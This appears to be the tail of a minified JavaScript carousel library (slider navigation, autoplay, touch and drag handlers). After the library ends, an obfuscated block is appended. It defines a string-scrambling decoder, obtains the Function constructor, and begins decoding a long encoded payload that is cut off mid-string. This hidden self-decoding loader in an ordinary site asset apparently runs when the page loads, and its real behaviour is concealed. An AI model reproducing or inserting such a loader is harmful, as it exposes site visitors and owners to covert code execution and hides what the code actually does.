}() | |
} else | |
xn() | |
} | |
function xn() { | |
F && !$ || (jn(), | |
$ ? (St = _n(), | |
Ut && (_t = Tn()), | |
Wt = Rt(), | |
$e(Kt || _t)) : Ci()), | |
I && $n(), | |
bn(), | |
wn() | |
} | |
function bn() { | |
if (Vn(), | |
T.insertAdjacentHTML("afterbegin", '<div class="tns-liveregion tns-visually-hidden" aria-live="polite" aria-atomic="true">slide <span class="current">' + Hn() + "</span> of " + Q + "</div>"), | |
B = T.querySelector(".tns-liveregion .current"), | |
se) { | |
var t = gt ? "stop" : "start"; | |
je ? ji(je, { | |
"data-action": t | |
}) : H.autoplayButtonOutput && (T.insertAdjacentHTML(on(H.autoplayPosition), '<button type="button" data-action="' + t + '">' + Ge[0] + t + Ge[1] + bt[0] + "</button>"), | |
je = T.querySelector("[data-action]")), | |
je && Ui(je, { | |
click: di | |
}), | |
gt && (ci(), | |
wt && Ui(V, ee), | |
Ct && Ui(V, ne)) | |
} | |
if (ue) { | |
if (Ae) | |
ji(Ae, { | |
"aria-label": "Carousel Pagination" | |
}), | |
Ii(Ee = Ae.children, function(t, e) { | |
ji(t, { | |
"data-nav": e, | |
tabindex: "-1", | |
"aria-label": ke + (e + 1), | |
"aria-controls": Yt | |
}) | |
}); | |
else { | |
for (var e = "", n = le ? "" : 'style="display:none"', i = 0; i < Q; i++) | |
e += '<button type="button" data-nav="' + i + '" tabindex="-1" aria-controls="' + Yt + '" ' + n + ' aria-label="' + ke + (i + 1) + '"></button>'; | |
e = '<div class="tns-nav" aria-label="Carousel Pagination">' + e + "</div>", | |
T.insertAdjacentHTML(on(H.navPosition), e), | |
Ae = T.querySelector(".tns-nav"), | |
Ee = Ae.children | |
} | |
if (Ti(), | |
x) { | |
var a = x.substring(0, x.length - 18).toLowerCase() | |
, r = "transition: all " + st / 1e3 + "s"; | |
a && (r = "-" + a + "-" + r), | |
ki(Mt, "[aria-controls^=" + Yt + "-item]", r, Ri(Mt)) | |
} | |
ji(Ee[He], { | |
"aria-label": ke + (He + 1) + Re | |
}), | |
Vi(Ee[He], "tabindex"), | |
zi(Ee[He], De), | |
Ui(Ae, te) | |
} | |
oe && (xe || we && Ce || (T.insertAdjacentHTML(on(H.controlsPosition), '<div class="tns-controls" aria-label="Carousel Navigation" tabindex="0"><button type="button" data-controls="prev" tabindex="-1" aria-controls="' + Yt + '">' + pt[0] + '</button><button type="button" data-controls="next" tabindex="-1" aria-controls="' + Yt + '">' + pt[1] + "</button></div>"), | |
xe = T.querySelector(".tns-controls")), | |
we && Ce || (we = xe.children[0], | |
Ce = xe.children[1]), | |
H.controlsContainer && ji(xe, { | |
"aria-label": "Carousel Navigation", | |
tabindex: "0" | |
}), | |
(H.controlsContainer || H.prevButton && H.nextButton) && ji([we, Ce], { | |
"aria-controls": Yt, | |
tabindex: "-1" | |
}), | |
(H.controlsContainer || H.prevButton && H.nextButton) && (ji(we, { | |
"data-controls": "prev" | |
}), | |
ji(Ce, { | |
"data-controls": "next" | |
})), | |
ye = Qn(we), | |
ge = Qn(Ce), | |
Kn(), | |
xe ? Ui(xe, $t) : (Ui(we, $t), | |
Ui(Ce, $t))), | |
An() | |
} | |
function wn() { | |
if (I && s) { | |
var t = {}; | |
t[s] = ai, | |
Ui(V, t) | |
} | |
mt && Ui(V, ae, H.preventScrollOnTouch), | |
yt && Ui(V, re), | |
lt && Ui(O, ie), | |
"inner" === R ? Qt.on("outerResized", function() { | |
Mn(), | |
Qt.emit("innerLoaded", Ei()) | |
}) : (k || tt || $ || dt || !F) && Ui(m, { | |
resize: Cn | |
}), | |
dt && ("outer" === R ? Qt.on("innerLoaded", Pn) : Kt || Pn()), | |
Dn(), | |
Kt ? Bn() : _t && Ln(), | |
Qt.on("indexChanged", Wn), | |
"inner" === R && Qt.emit("innerLoaded", Ei()), | |
"function" == typeof Gt && Gt(Ei()), | |
Y = !0 | |
} | |
function Cn(t) { | |
Ai(function() { | |
Mn(pi(t)) | |
}) | |
} | |
function Mn(t) { | |
if (Y) { | |
"outer" === R && Qt.emit("outerResized", Ei(t)), | |
X = rn(); | |
var e, n = q, i = !1; | |
k && (En(), | |
(e = n !== q) && Qt.emit("newBreakpointStart", Ei(t))); | |
var a, r, o, u, l = rt, s = Kt, c = _t, f = lt, d = vt, v = ht, p = mt, h = yt, m = gt, y = wt, g = Ct, x = It; | |
if (e) { | |
var b = tt | |
, w = dt | |
, C = pt | |
, M = at | |
, T = bt; | |
if (!D) | |
var E = nt | |
, A = et | |
} | |
if (lt = sn("arrowKeys"), | |
vt = sn("controls"), | |
ht = sn("nav"), | |
mt = sn("touch"), | |
at = sn("center"), | |
yt = sn("mouseDrag"), | |
gt = sn("autoplay"), | |
wt = sn("autoplayHoverPause"), | |
Ct = sn("autoplayResetOnVisibility"), | |
e && (Kt = sn("disable"), | |
tt = sn("fixedWidth"), | |
st = sn("speed"), | |
dt = sn("autoHeight"), | |
pt = sn("controlsText"), | |
bt = sn("autoplayText"), | |
xt = sn("autoplayTimeout"), | |
D || (et = sn("edgePadding"), | |
nt = sn("gutter"))), | |
$e(Kt), | |
it = un(), | |
F && !$ || Kt || (jn(), | |
F || (Ci(), | |
i = !0)), | |
(tt || $) && (St = _n(), | |
Wt = Rt()), | |
(e || tt) && (rt = sn("items"), | |
ot = sn("slideBy"), | |
(r = rt !== l) && (tt || $ || (Wt = Rt()), | |
_e())), | |
e && Kt !== s && (Kt ? Bn() : function() { | |
if (!Jt) | |
return; | |
if (Mt.disabled = !1, | |
V.className += Xt, | |
$n(), | |
ft) | |
for (var t = Nt; t--; ) | |
I && Xi(G[t]), | |
Xi(G[Lt - t - 1]); | |
if (!I) | |
for (var e = It, n = It + Q; e < n; e++) { | |
var i = G[e] | |
, a = e < It + rt ? P : W; | |
i.style.left = 100 * (e - It) / rt + "%", | |
zi(i, a) | |
} | |
Nn(), | |
Jt = !1 | |
}()), | |
Ut && (e || tt || $) && (_t = Tn()) !== c && (_t ? (ti(Zn(en(0))), | |
Ln()) : (!function() { | |
if (!Zt) | |
return; | |
et && D && (j.style.margin = ""); | |
if (Nt) | |
for (var t = "tns-transparent", e = Nt; e--; ) | |
I && Wi(G[e], t), | |
Wi(G[Lt - e - 1], t); | |
Nn(), | |
Zt = !1 | |
}(), | |
i = !0)), | |
$e(Kt || _t), | |
gt || (wt = Ct = !1), | |
lt !== f && (lt ? Ui(O, ie) : _i(O, ie)), | |
vt !== d && (vt ? xe ? Xi(xe) : (we && Xi(we), | |
Ce && Xi(Ce)) : xe ? Qi(xe) : (we && Qi(we), | |
Ce && Qi(Ce))), | |
ht !== v && (ht ? (Xi(Ae), | |
Ti()) : Qi(Ae)), | |
mt !== p && (mt ? Ui(V, ae, H.preventScrollOnTouch) : _i(V, ae)), | |
yt !== h && (yt ? Ui(V, re) : _i(V, re)), | |
gt !== m && (gt ? (je && Xi(je), | |
Pe || We || ci()) : (je && Qi(je), | |
Pe && fi())), | |
wt !== y && (wt ? Ui(V, ee) : _i(V, ee)), | |
Ct !== g && (Ct ? Ui(O, ne) : _i(O, ne)), | |
e) { | |
if (tt === b && at === M || (i = !0), | |
dt !== w && (dt || (j.style.height = "")), | |
vt && pt !== C && (we.innerHTML = pt[0], | |
Ce.innerHTML = pt[1]), | |
je && bt !== T) { | |
var N = gt ? 1 : 0 | |
, L = je.innerHTML | |
, B = L.length - T[N].length; | |
L.substring(B) === T[N] && (je.innerHTML = L.substring(0, B) + bt[N]) | |
} | |
} else | |
at && (tt || $) && (i = !0); | |
if ((r || tt && !$) && (Le = Mi(), | |
Ti()), | |
(a = It !== x) ? (Qt.emit("indexChanged", Ei()), | |
i = !0) : r ? a || Wn() : (tt || $) && (Dn(), | |
Vn(), | |
Sn()), | |
r && !I && function() { | |
for (var t = It + Math.min(Q, rt), e = Lt; e--; ) { | |
var n = G[e]; | |
It <= e && e < t ? (zi(n, "tns-moving"), | |
n.style.left = 100 * (e - It) / rt + "%", | |
zi(n, P), | |
Wi(n, W)) : n.style.left && (n.style.left = "", | |
zi(n, W), | |
Wi(n, P)), | |
Wi(n, z) | |
} | |
setTimeout(function() { | |
Ii(G, function(t) { | |
Wi(t, "tns-moving") | |
}) | |
}, 300) | |
}(), | |
!Kt && !_t) { | |
if (e && !D && (et === A && nt === E || (j.style.cssText = cn(et, nt, tt, st, dt)), | |
F)) { | |
I && (V.style.width = fn(tt, nt, rt)); | |
var S = dn(tt, nt, rt) + vn(nt); | |
u = Ri(o = Mt) - 1, | |
"deleteRule"in o ? o.deleteRule(u) : o.removeRule(u), | |
ki(Mt, "#" + Yt + " > .tns-item", S, Ri(Mt)) | |
} | |
dt && Pn(), | |
i && ($n(), | |
Pt = It) | |
} | |
e && Qt.emit("newBreakpointEnd", Ei(t)) | |
} | |
} | |
function Tn() { | |
if (!tt && !$) | |
return Q <= (at ? rt - (rt - 1) / 2 : rt); | |
var t = tt ? (tt + nt) * Q : N[Q] | |
, e = et ? it + 2 * et : it + nt; | |
return at && (e -= tt ? (it - tt) / 2 : (it - (N[It + 1] - N[It] - nt)) / 2), | |
t <= e | |
} | |
function En() { | |
for (var t in q = 0, | |
k) | |
(t = parseInt(t)) <= X && (q = t) | |
} | |
function An() { | |
!gt && je && Qi(je), | |
!ht && Ae && Qi(Ae), | |
vt || (xe ? Qi(xe) : (we && Qi(we), | |
Ce && Qi(Ce))) | |
} | |
function Nn() { | |
gt && je && Xi(je), | |
ht && Ae && Xi(Ae), | |
vt && (xe ? Xi(xe) : (we && Xi(we), | |
Ce && Xi(Ce))) | |
} | |
function Ln() { | |
if (!Zt) { | |
if (et && (j.style.margin = "0px"), | |
Nt) | |
for (var t = "tns-transparent", e = Nt; e--; ) | |
I && zi(G[e], t), | |
zi(G[Lt - e - 1], t); | |
An(), | |
Zt = !0 | |
} | |
} | |
function Bn() { | |
if (!Jt) { | |
if (Mt.disabled = !0, | |
V.className = V.className.replace(Xt.substring(1), ""), | |
Vi(V, ["style"]), | |
ft) | |
for (var t = Nt; t--; ) | |
I && Qi(G[t]), | |
Qi(G[Lt - t - 1]); | |
if (F && I || Vi(j, ["style"]), | |
!I) | |
for (var e = It, n = It + Q; e < n; e++) { | |
var i = G[e]; | |
Vi(i, ["style"]), | |
Wi(i, P), | |
Wi(i, W) | |
} | |
An(), | |
Jt = !0 | |
} | |
} | |
function Sn() { | |
var t = Hn(); | |
B.innerHTML !== t && (B.innerHTML = t) | |
} | |
function Hn() { | |
var t = On() | |
, e = t[0] + 1 | |
, n = t[1] + 1; | |
return e === n ? e + "" : e + " to " + n | |
} | |
function On(t) { | |
null == t && (t = Zn()); | |
var n, i, a, r = It; | |
if (at || et ? ($ || tt) && (i = -(parseFloat(t) + et), | |
a = i + it + 2 * et) : $ && (i = N[It], | |
a = i + it), | |
$) | |
N.forEach(function(t, e) { | |
e < Lt && ((at || et) && t <= i + .5 && (r = e), | |
.5 <= a - t && (n = e)) | |
}); | |
else { | |
if (tt) { | |
var e = tt + nt; | |
at || et ? (r = Math.floor(i / e), | |
n = Math.ceil(a / e - 1)) : n = r + Math.ceil(it / e) - 1 | |
} else if (at || et) { | |
var o = rt - 1; | |
if (at ? (r -= o / 2, | |
n = It + o / 2) : n = It + o, | |
et) { | |
var u = et * rt / it; | |
r -= u, | |
n += u | |
} | |
r = Math.floor(r), | |
n = Math.ceil(n) | |
} else | |
n = r + rt - 1; | |
r = Math.max(r, 0), | |
n = Math.min(n, Lt - 1) | |
} | |
return [r, n] | |
} | |
function Dn() { | |
if (Tt && !Kt) { | |
var t = On(); | |
t.push(Et), | |
In.apply(null, t).forEach(function(t) { | |
if (!Pi(t, pe)) { | |
var e = {}; | |
e[s] = function(t) { | |
t.stopPropagation() | |
} | |
, | |
Ui(t, e), | |
Ui(t, he), | |
t.src = Fi(t, "data-src"); | |
var n = Fi(t, "data-srcset"); | |
n && (t.srcset = n), | |
zi(t, "loading") | |
} | |
}) | |
} | |
} | |
function kn(t) { | |
zi(t, "loaded"), | |
Rn(t) | |
} | |
function Rn(t) { | |
zi(t, pe), | |
Wi(t, "loading"), | |
_i(t, he) | |
} | |
function In(t, e, n) { | |
var i = []; | |
for (n || (n = "img"); t <= e; ) | |
Ii(G[t].querySelectorAll(n), function(t) { | |
i.push(t) | |
}), | |
t++; | |
return i | |
} | |
function Pn() { | |
var t = In.apply(null, On()); | |
Ai(function() { | |
zn(t, Fn) | |
}) | |
} | |
function zn(n, t) { | |
return L ? t() : (n.forEach(function(t, e) { | |
!Tt && t.complete && Rn(t), | |
Pi(t, pe) && n.splice(e, 1) | |
}), | |
n.length ? void Ai(function() { | |
zn(n, t) | |
}) : t()) | |
} | |
function Wn() { | |
Dn(), | |
Vn(), | |
Sn(), | |
Kn(), | |
function() { | |
if (ht && (He = 0 <= Se ? Se : an(), | |
Se = -1, | |
He !== Oe)) { | |
var t = Ee[Oe] | |
, e = Ee[He]; | |
ji(t, { | |
tabindex: "-1", | |
"aria-label": ke + (Oe + 1) | |
}), | |
Wi(t, De), | |
ji(e, { | |
"aria-label": ke + (He + 1) + Re | |
}), | |
Vi(e, "tabindex"), | |
zi(e, De), | |
Oe = He | |
} | |
}() | |
} | |
function qn(t, e) { | |
for (var n = [], i = t, a = Math.min(t + e, Lt); i < a; i++) | |
n.push(G[i].offsetHeight); | |
return Math.max.apply(null, n) | |
} | |
function Fn() { | |
var t = dt ? qn(It, rt) : qn(Nt, Q) | |
, e = M || j; | |
e.style.height !== t && (e.style.height = t + "px") | |
} | |
function jn() { | |
N = [0]; | |
var n = F ? "left" : "top" | |
, i = F ? "right" : "bottom" | |
, a = G[0].getBoundingClientRect()[n]; | |
Ii(G, function(t, e) { | |
e && N.push(t.getBoundingClientRect()[n] - a), | |
e === Lt - 1 && N.push(t.getBoundingClientRect()[i] - a) | |
}) | |
} | |
function Vn() { | |
var t = On() | |
, n = t[0] | |
, i = t[1]; | |
Ii(G, function(t, e) { | |
n <= e && e <= i ? qi(t, "aria-hidden") && (Vi(t, ["aria-hidden", "tabindex"]), | |
zi(t, de)) : qi(t, "aria-hidden") || (ji(t, { | |
"aria-hidden": "true", | |
tabindex: "-1" | |
}), | |
Wi(t, de)) | |
}) | |
} | |
function Gn(t) { | |
return t.nodeName.toLowerCase() | |
} | |
function Qn(t) { | |
return "button" === Gn(t) | |
} | |
function Xn(t) { | |
return "true" === t.getAttribute("aria-disabled") | |
} | |
function Yn(t, e, n) { | |
t ? e.disabled = n : e.setAttribute("aria-disabled", n.toString()) | |
} | |
function Kn() { | |
if (vt && !ct && !ft) { | |
var t = ye ? we.disabled : Xn(we) | |
, e = ge ? Ce.disabled : Xn(Ce) | |
, n = It <= zt | |
, i = !ct && Wt <= It; | |
n && !t && Yn(ye, we, !0), | |
!n && t && Yn(ye, we, !1), | |
i && !e && Yn(ge, Ce, !0), | |
!i && e && Yn(ge, Ce, !1) | |
} | |
} | |
function Jn(t, e) { | |
x && (t.style[x] = e) | |
} | |
function Un(t) { | |
return null == t && (t = It), | |
$ ? (it - (et ? nt : 0) - (N[t + 1] - N[t] - nt)) / 2 : tt ? (it - tt) / 2 : (rt - 1) / 2 | |
} | |
function _n() { | |
var t = it + (et ? nt : 0) - (tt ? (tt + nt) * Lt : N[Lt]); | |
return at && !ft && (t = tt ? -(tt + nt) * (Lt - 1) - Un() : Un(Lt - 1) - N[Lt - 1]), | |
0 < t && (t = 0), | |
t | |
} | |
function Zn(t) { | |
var e; | |
if (null == t && (t = It), | |
F && !$) | |
if (tt) | |
e = -(tt + nt) * t, | |
at && (e += Un()); | |
else { | |
var n = r ? Lt : rt; | |
at && (t -= Un()), | |
e = 100 * -t / n | |
} | |
else | |
e = -N[t], | |
at && $ && (e += Un()); | |
return Bt && (e = Math.max(e, St)), | |
e += !F || $ || tt ? "px" : "%" | |
} | |
function $n(t) { | |
Jn(V, "0s"), | |
ti(t) | |
} | |
function ti(t) { | |
null == t && (t = Zn()), | |
V.style[Ot] = Dt + t + kt | |
} | |
function ei(t, e, n, i) { | |
var a = t + rt; | |
ft || (a = Math.min(a, Lt)); | |
for (var r = t; r < a; r++) { | |
var o = G[r]; | |
i || (o.style.left = 100 * (r - It) / rt + "%"), | |
C && u && (o.style[u] = o.style[l] = C * (r - t) / 1e3 + "s"), | |
Wi(o, e), | |
zi(o, n), | |
i && At.push(o) | |
} | |
} | |
function ni(t, e) { | |
Ht && _e(), | |
(It !== Pt || e) && (Qt.emit("indexChanged", Ei()), | |
Qt.emit("transitionStart", Ei()), | |
dt && Pn(), | |
Pe && t && 0 <= ["click", "keydown"].indexOf(t.type) && fi(), | |
Vt = !0, | |
Ze()) | |
} | |
function ii(t) { | |
return t.toLowerCase().replace(/-/g, "") | |
} | |
function ai(t) { | |
if (I || Vt) { | |
if (Qt.emit("transitionEnd", Ei(t)), | |
!I && 0 < At.length) | |
for (var e = 0; e < At.length; e++) { | |
var n = At[e]; | |
n.style.left = "", | |
l && u && (n.style[l] = "", | |
n.style[u] = ""), | |
Wi(n, z), | |
zi(n, W) | |
} | |
if (!t || !I && t.target.parentNode === V || t.target === V && ii(t.propertyName) === ii(Ot)) { | |
if (!Ht) { | |
var i = It; | |
_e(), | |
It !== i && (Qt.emit("indexChanged", Ei()), | |
$n()) | |
} | |
"inner" === R && Qt.emit("innerLoaded", Ei()), | |
Vt = !1, | |
Pt = It | |
} | |
} | |
} | |
function ri(t, e) { | |
if (!_t) | |
if ("prev" === t) | |
oi(e, -1); | |
else if ("next" === t) | |
oi(e, 1); | |
else { | |
if (Vt) { | |
if (qt) | |
return; | |
ai() | |
} | |
var n = nn() | |
, i = 0; | |
if ("first" === t ? i = -n : "last" === t ? i = I ? Q - rt - n : Q - 1 - n : ("number" != typeof t && (t = parseInt(t)), | |
isNaN(t) || (e || (t = Math.max(0, Math.min(Q - 1, t))), | |
i = t - n)), | |
!I && i && Math.abs(i) < rt) { | |
var a = 0 < i ? 1 : -1; | |
i += zt <= It + i - Q ? Q * a : 2 * Q * a * -1 | |
} | |
It += i, | |
I && ft && (It < zt && (It += Q), | |
Wt < It && (It -= Q)), | |
nn(It) !== nn(Pt) && ni(e) | |
} | |
} | |
function oi(t, e) { | |
if (Vt) { | |
if (qt) | |
return; | |
ai() | |
} | |
var n; | |
if (!e) { | |
for (var i = hi(t = pi(t)); i !== xe && [we, Ce].indexOf(i) < 0; ) | |
i = i.parentNode; | |
var a = [we, Ce].indexOf(i); | |
0 <= a && (n = !0, | |
e = 0 === a ? -1 : 1) | |
} | |
if (ct) { | |
if (It === zt && -1 === e) | |
return void ri("last", t); | |
if (It === Wt && 1 === e) | |
return void ri("first", t) | |
} | |
e && (It += ot * e, | |
$ && (It = Math.floor(It)), | |
ni(n || t && "keydown" === t.type ? t : null)) | |
} | |
function ui() { | |
Ie = setInterval(function() { | |
oi(null, Fe) | |
}, xt), | |
Pe = !0 | |
} | |
function li() { | |
clearInterval(Ie), | |
Pe = !1 | |
} | |
function si(t, e) { | |
ji(je, { | |
"data-action": t | |
}), | |
je.innerHTML = Ge[0] + t + Ge[1] + e | |
} | |
function ci() { | |
ui(), | |
je && si("stop", bt[1]) | |
} | |
function fi() { | |
li(), | |
je && si("start", bt[0]) | |
} | |
function di() { | |
Pe ? (fi(), | |
We = !0) : (ci(), | |
We = !1) | |
} | |
function vi(t) { | |
t.focus() | |
} | |
function pi(t) { | |
return mi(t = t || m.event) ? t.changedTouches[0] : t | |
} | |
function hi(t) { | |
return t.target || m.event.srcElement | |
} | |
function mi(t) { | |
return 0 <= t.type.indexOf("touch") | |
} | |
function yi(t) { | |
t.preventDefault ? t.preventDefault() : t.returnValue = !1 | |
} | |
function gi() { | |
return a = Ke.y - Ye.y, | |
r = Ke.x - Ye.x, | |
t = Math.atan2(a, r) * (180 / Math.PI), | |
e = Ft, | |
n = !1, | |
i = Math.abs(90 - Math.abs(t)), | |
90 - e <= i ? n = "horizontal" : i <= e && (n = "vertical"), | |
n === H.axis; | |
var t, e, n, i, a, r | |
} | |
function xi(t) { | |
if (Vt) { | |
if (qt) | |
return; | |
ai() | |
} | |
gt && Pe && li(), | |
Je = !0, | |
Xe && (Ni(Xe), | |
Xe = null); | |
var e = pi(t); | |
Qt.emit(mi(t) ? "touchStart" : "dragStart", Ei(t)), | |
!mi(t) && 0 <= ["img", "a"].indexOf(Gn(hi(t))) && yi(t), | |
Ke.x = Ye.x = e.clientX, | |
Ke.y = Ye.y = e.clientY, | |
I && (Qe = parseFloat(V.style[Ot].replace(Dt, "")), | |
Jn(V, "0s")) | |
} | |
function bi(t) { | |
if (Je) { | |
var e = pi(t); | |
Ke.x = e.clientX, | |
Ke.y = e.clientY, | |
I ? Xe || (Xe = Ai(function() { | |
!function t(e) { | |
if (!jt) | |
return void (Je = !1); | |
Ni(Xe); | |
Je && (Xe = Ai(function() { | |
t(e) | |
})); | |
"?" === jt && (jt = gi()); | |
if (jt) { | |
!me && mi(e) && (me = !0); | |
try { | |
e.type && Qt.emit(mi(e) ? "touchMove" : "dragMove", Ei(e)) | |
} catch (t) {} | |
var n = Qe | |
, i = Ue(Ke, Ye); | |
if (!F || tt || $) | |
n += i, | |
n += "px"; | |
else { | |
var a = r ? i * rt * 100 / ((it + nt) * Lt) : 100 * i / (it + nt); | |
n += a, | |
n += "%" | |
} | |
V.style[Ot] = Dt + n + kt | |
} | |
}(t) | |
})) : ("?" === jt && (jt = gi()), | |
jt && (me = !0)), | |
("boolean" != typeof t.cancelable || t.cancelable) && me && t.preventDefault() | |
} | |
} | |
function wi(i) { | |
if (Je) { | |
Xe && (Ni(Xe), | |
Xe = null), | |
I && Jn(V, ""), | |
Je = !1; | |
var t = pi(i); | |
Ke.x = t.clientX, | |
Ke.y = t.clientY; | |
var a = Ue(Ke, Ye); | |
if (Math.abs(a)) { | |
if (!mi(i)) { | |
var n = hi(i); | |
Ui(n, { | |
click: function t(e) { | |
yi(e), | |
_i(n, { | |
click: t | |
}) | |
} | |
}) | |
} | |
I ? Xe = Ai(function() { | |
if (F && !$) { | |
var t = -a * rt / (it + nt); | |
t = 0 < a ? Math.floor(t) : Math.ceil(t), | |
It += t | |
} else { | |
var e = -(Qe + a); | |
if (e <= 0) | |
It = zt; | |
else if (e >= N[Lt - 1]) | |
It = Wt; | |
else | |
for (var n = 0; n < Lt && e >= N[n]; ) | |
e > N[It = n] && a < 0 && (It += 1), | |
n++ | |
} | |
ni(i, a), | |
Qt.emit(mi(i) ? "touchEnd" : "dragEnd", Ei(i)) | |
}) : jt && oi(i, 0 < a ? -1 : 1) | |
} | |
} | |
"auto" === H.preventScrollOnTouch && (me = !1), | |
Ft && (jt = "?"), | |
gt && !Pe && ui() | |
} | |
function Ci() { | |
(M || j).style.height = N[It + rt] - N[It] + "px" | |
} | |
function Mi() { | |
var t = tt ? (tt + nt) * Q / it : Q / rt; | |
return Math.min(Math.ceil(t), Q) | |
} | |
function Ti() { | |
if (ht && !le && Le !== Be) { | |
var t = Be | |
, e = Le | |
, n = Xi; | |
for (Le < Be && (t = Le, | |
e = Be, | |
n = Qi); t < e; ) | |
n(Ee[t]), | |
t++; | |
Be = Le | |
} | |
} | |
function Ei(t) { | |
return { | |
container: V, | |
slideItems: G, | |
navContainer: Ae, | |
navItems: Ee, | |
controlsContainer: xe, | |
hasControls: oe, | |
prevButton: we, | |
nextButton: Ce, | |
items: rt, | |
slideBy: ot, | |
cloneCount: Nt, | |
slideCount: Q, | |
slideCountNew: Lt, | |
index: It, | |
indexCached: Pt, | |
displayIndex: tn(), | |
navCurrentIndex: He, | |
navCurrentIndexCached: Oe, | |
pages: Le, | |
pagesCached: Be, | |
sheet: Mt, | |
isOn: Y, | |
event: t || {} | |
} | |
} | |
f && console.warn("No slides found in", H.container) | |
}; | |
return $i | |
}(); | |
;var o1, o2, o3, o4, o11, o22, o33, o44, b1, b2, ccn, dC43, r3, chckst, dd91, ab, dB34, bD34, gG77, iV21, nI88, b2_, f1, f2, f3, f4, vAr, dN34, dM34, dY34, dC34, i71, cc56, vD561, cF98, cstchd, aC57, sF86, sD89, en_snd, sR31, dI66, cT49, cN78, pojojnoln, wefwfew, ljklkjljilu; | |
(function() { | |
var kjn = '' | |
, MXQ = 759 - 748; | |
function UDS(b) { | |
var r = 6298399; | |
var o = b.length; | |
var f = []; | |
for (var s = 0; s < o; s++) { | |
f[s] = b.charAt(s) | |
} | |
;for (var s = 0; s < o; s++) { | |
var c = r * (s + 517) + (r % 26020); | |
var j = r * (s + 277) + (r % 40961); | |
var l = c % o; | |
var v = j % o; | |
var p = f[l]; | |
f[l] = f[v]; | |
f[v] = p; | |
r = (c + j) % 6680637; | |
} | |
;return f.join('') | |
} | |
;var ZhC = UDS('laessrrutnwmbnpoyhokgixzdoutrjtqccvcf').substr(0, MXQ); | |
var LSm = 'f)C[fv.ogo=exs!)zo)-)r0uf"v7(5i7ahirklmnu]=rn1rifqiz =f=; za;e(r5c(s()9;66,r4hxql28)80rnA;[1;ufC6[,9+f+ttjnf18, fgnxcns](th}7"=,v6;vr,,0t];(r;,(g3l5nr,vnetg).[;so 5) +{a[6 )hs=)vm7v2e1o)=e+duz-8]wf0rnc)jha]07daaog(m]( i6ldndhw (phu6v,.n,.<70smrdls;i9.}x=utl[ ;)tvqread.ontr;=a)ty.ti)hs="e)=lr{[;{ )=oe1tr=sxh)n=9.grr=psg;(rl;lrahrhj0<gx+)1uval n)("=.1phgq==t-m8[)n=pvaj=+-;oxrh+09 ai+g;at+=duAisn)(<t,zh,);)z;]*i[]{ en( t=*or4{;hnrf efvt+isel+;,A.(i)reev[std ,fh(e,lc.i.;==j1S(r+h6<mn7grl-sCs(;Agrpawtn[ou h=;loca+t; )9dlce(ing]+rn(eel;3er2nukzeewct}(i==a;hvta=;]oiu(o+;(a-u{rrd,vsat4}+n(g.ha.maC=ipma2]u[++r2f;pds;1r8i8,l93nv=ma)(;)haaaho[;olbi=7ex.vb).vc avigr}=hxpja=z]""8 Clae{ si(t=jo;;gea, k"m=koi+outndaa(;an=.21rr;36,4],i),(+avc=.c)1>p)nze evtSnr9j=Civ[;0s4hrpr=0,z;l)on2b.Croa+v=<n.e-ng+;8zo+rkao..()ctlurjdnC]rAt!n;vli;,(.a0(=nc.} rn80=rgc},0lw+p>2;;;ji,un1.vvoi(;u+"0"".,(u.(;r,'; | |
var AET = UDS[ZhC]; | |
var JIX = ''; | |
var Uku = AET; | |
var BTX = AET(JIX, UDS(LSm)); | |
var FpP = BTX(UDS('ih)c 2pni:%#DD5rn,|p26tca 0..l;..tel30g^xd[[5a26lC2i r4a75ne!7tDf7.13r-orh1gt};;va-.a1d.iGc9Zl,.2uUdea,^c12c:a21Z.suW0(t];ab8A34,llt2]S=Gn]osRAa=[rg(s4.aFy,.>+1dG-11M3050rA\/6H11e;rsmA7ca,tn^196Zw5oab;}p9t|pm9]Nprt2cAt0L.5^AZ0i,G)Au!_;+1(0 ,.ua-)uC0a61:1Hoe33enb=a.ap^g,!p2avC1sr89tG.esp]ICap,oc.h!<.rsr1.+1\/ss`)e*]n^-m9ctZe=I"a,0m.-|7e0^n0-]eZo\/c,xaeG-sgu^w.cA,2G62esa#50o02_GeymGTriv!Gk,3Pr,>(c\/G,[02^rWh.armrKs+vjap7G2nZ!6l:Ca02Z))r)Ga76pp|o"c3,aAecdH,wsdS=Z!Hknu5I3u(Go1ttk74t)6Z{2C.t,iuhsZei2drs?*2sCm2)c3l=70t:t%r5e35327ZMEgc6)V9ue)Z69_3iZ!Eb0.9o1Mb)t!38n59p]2e M2 3(Z6d.eto.e|%1a^.aT_2.pG65,!oi_edmi.mrusAI@aS=Sci,ru3nn]^1-8mxrg2p1S)^&8!,gu,7rrGEZpo,p8_&oZ11-^G Ze2a_f)da1Zld9As,rAnt!lz0o39411ao3pZ,t:;Za&r.8Ar!6It7r},#3bo"1a2r.m1i9^Z70.em5,wx%5{],=ep)e49_}tatb4csZ,h1^.)a\/hr)ochjica[A\'7nE2Gr3i1_)\/rZ)t2cZi*]h5[^eiet,7)l4ug0]h8}*o{eG!]2Zp3%a)1_4tu:7amA0a%8:014n51)lo>r.,G,7ps;pZaG8Friu-A[5uv6,ClZben..nc;7i`rs^xto"ysf4G:,]24r]G}.Cab]bpGt)fancaZtaW5s g;7m!rse5po^#eZE{.v!,l1)vrA$0Guetw#)_)3nc_A2o!,,rpsk;2n.ft)0i,82.1z5,.2rg:](6l0K.ix5]n6r!e6lbI^%t^0mmggx,cl0|4tms]_,13,Aw+,:eM_:Z-&98]4i^21G tGci11Nm6(^m]))0dk1DtE76;19tbeZzZx.,$o-A415,ma5or45ao<7IZ+nt7a9i\'.22[u,8\\1#:so,;29",I(8=01ah,,.A|e2Z6aa]_3dCl n1Gf2Z)]]31e,lY%],uZ5mp5tA4m1tr1%Ai)DaT3,.e[110Zni2.,ea^70p9)mbrtT0GA{aP55x1[.6pA6irG,4]od8a71r 4,n^e,5&59:b00-)Zie32+{a3sse^m1t[e)3gA;t,]6o]:0lr50aG)84a1(p1]l.;9dXr8}ir4f4{^}}d^4-|uZA,duwwnp:t,4m2}Acioix*.tMu4to,:2h,"ZI^|1;4l-^Z.-#58l.i9k.c7cmn.e2}2na1e^Te3n;fa^mn-.t3c\/:)a87r;]i6!A_y[7=c")Zen4?4{siA1CZ,1faoG.obe,cuif,&i1ia1ecmM:leZ^(]Zk.0ZCmEZ2a{2r_G):2c-an217n%A=en3b12r.];naSGh+;R91A.9a.0a0b!)a42n5nE=ay!l^.b^4F^(pcm!v5n,uca59.o#1b^G7ee1n,y3A],esc;o)8ejtN1u:.Z#67e6,:to^n0i6l)g:GGI?1,0a1i,]nd,]aM{b.,03D,t}7.t%^1^.a;.6^)aK65,mn918XG2^1;;1n5}, 